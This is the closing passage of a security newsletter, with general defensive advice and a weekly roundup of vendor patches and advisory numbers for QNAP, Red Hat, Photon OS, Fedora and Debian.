The fundamentals still matter. Patch known vulnerabilities, audit third-party access, enforce least privilege, and educate users. But the landscape is moving fast, and defensive success increasingly depends on behavioral detection, context-aware analysis, and the willingness to enforce restrictive policies even when they're inconvenient.
So patch your Zimbra instances, revoke that sketchy Chrome extension, and maybe take a hard look at your OAuth tenant policies before the holiday break. The threat actors aren't taking time off, and neither should your defenses.
Keep the logs rolling and the alerts tuned. We'll be back with more after the holiday.
-- KryptoKat & UncleSp1d3r
Vendor Patch Roundup
For vulnerability management teams, the following patches and plugin updates were released this week:
- QNAP QTS/QuTS hero: CVE-2024-37046 (post-auth path traversal) patched in QTS 5.2.1.2930 build 20241025+ and QuTS hero h5.2.1.2929 build 20241025+. Tenable OT plugin 504869 and Nessus plugins 279500/279501 released.
- Red Hat Enterprise Linux: RHSA-2025:23733 and RHSA-2025:23737 (go-toolset vulnerabilities), RHSA-2025:23745 (git-lfs), RHSA-2025:23730 (kpatch), RHSA-2025:23736/23747 (grafana), RHSA-2025:23739 (mod_md), RHSA-2025:23789 (kernel).
- Photon OS 5.0: Linux kernel CVE-2024-53177 (use-after-free in SMB client) patched in linux-6.1.159-4.ph5.
- Fedora: gobuster package updates.
- Debian: python3-mechanize package updates.
Full plugin details available at Tenable's update page.